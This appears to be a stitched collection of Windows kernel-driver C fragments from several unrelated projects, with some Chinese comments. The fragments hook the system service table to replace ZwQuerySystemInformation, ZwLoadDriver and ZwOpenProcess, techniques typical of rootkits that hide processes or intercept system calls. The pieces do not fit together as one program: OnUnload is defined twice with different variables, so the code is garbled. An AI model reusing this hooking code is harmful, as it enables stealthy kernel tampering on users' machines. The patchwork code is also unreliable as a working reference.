NTSTATUS DriverEntry( IN PDRIVER_OBJECT theDriverObject, IN PUNICODE_STRING theRegistryPath )
{
DbgPrint("BHWin is al1v3!");
// make sure we can write to the memory pages that hold the service table
if(!NT_SUCCESS(ChangeServiceTableMemoryFlags()) )
{
DbgPrint("Error, ChangeServiceTableMemoryFlags()");
return STATUS_UNSUCCESSFUL;
}
GetProcessNameOffset();
theDriverObject->DriverUnload = OnUnload;
// place the hook using InterlockedExchange (no need to disable interrupts)
// this uses the LOCK instruction to lock the memory bus during the next instruction
// Example:
// LOCK INC DWORD PTR [EDX+04]
// This staves off collisions on multi-processor machines, while cli/sti only disable interrupts
// on the current processor.
//
OldZwQuerySystemInformation =
(ZWQUERYSYSTEMINFORMATION) InterlockedExchange( (PLONG) &g_MappedSystemCallTable[ SYSCALL_INDEX(ZwQuerySystemInformation) ],
(LONG) NewZwQuerySystemInformation);
return STATUS_SUCCESS;
}
//-----------------------------------------------------------------------------
// Hook the system calls to allow us to pass control from user to kernel...
// LoadDriver system call hook is our gateway
//-----------------------------------------------------------------------------
VOID hook_syscalls()
{
debug("\t add hook to ZwLoadDriver to reroute to our " \
"hooked_ZwLoadDriver() \n");
orig_ZwLoadDriver =
(void *)InterlockedExchange(
(unsigned int *) &syscall_tbl[SYSCALL_INDEX(ZwLoadDriver)],
(unsigned int) hooked_ZwLoadDriver);
}
/**
* 还原钩子函数
*
*/
NTSTATUS sstUnhook_OpenProcess()
{
g_openProcessId = 0;
UpdateService(SYSCALL_INDEX(ZwOpenProcess),pOriNtOpenProcess );
if(m_MDL)
{
MmUnmapLockedPages(m_Mapped,m_MDL);
IoFreeMdl(m_MDL);
}
return STATUS_SUCCESS;
}
VOID OnUnload( IN PDRIVER_OBJECT DriverObject )
{
DbgPrint("BHWIN: OnUnload called\n");
// put back the old function pointer
InterlockedExchange( (PLONG) &g_MappedSystemCallTable[ SYSCALL_INDEX(ZwQuerySystemInformation) ],
(LONG) OldZwQuerySystemInformation);
// Unlock and Free MDL
if(g_MappedSystemCallTableMDL)
{
MmUnmapLockedPages(g_MappedSystemCallTable, g_MappedSystemCallTableMDL);
IoFreeMdl(g_MappedSystemCallTableMDL);
}
}
/**
* 设置钩子函数
*
*/
NTSTATUS sstHook_OpenProcess()
{
if(m_MDL == NULL)
{
m_MDL = MmCreateMdl(NULL,KeServiceDescriptorTable->ServiceTableBase,KeServiceDescriptorTable->NumberOfService*4);
if(!m_MDL)
return STATUS_UNSUCCESSFUL;
MmBuildMdlForNonPagedPool(m_MDL);
m_MDL->MdlFlags = m_MDL->MdlFlags | MDL_MAPPED_TO_SYSTEM_VA;
m_Mapped = (PVOID *)MmMapLockedPages(m_MDL, KernelMode);
HOOK_SYSCALL(ZwOpenProcess,MyNtOpenProcess,pOriNtOpenProcess);
g_openProcessId = (ULONG)SYSTEMSERVICE(ZwOpenProcess);
return STATUS_SUCCESS;
}
UpdateService(SYSCALL_INDEX(ZwOpenProcess),(PVOID)MyNtOpenProcess);
return STATUS_SUCCESS;
}
//-----------------------------------------------------------------------------
// Unload driver
//-----------------------------------------------------------------------------
VOID OnUnload(IN PDRIVER_OBJECT DriverObject)
{
DbgPrint("---------------- Driver Unloaded\n");
InterlockedExchange(
(unsigned int *) &syscall_tbl[SYSCALL_INDEX(ZwLoadDriver)],
(unsigned int) orig_ZwLoadDriver);
if(mdl_sys_call)
{
MmUnmapLockedPages(syscall_tbl, mdl_sys_call);
IoFreeMdl(mdl_sys_call);
}
// remove callback
#if BREAK_POINT
PsRemoveLoadImageNotifyRoutine(add_one_time_bp);
#endif
#if DATA_MINING
PsRemoveLoadImageNotifyRoutine(add_hooks_for_data_mining);
#endif
}
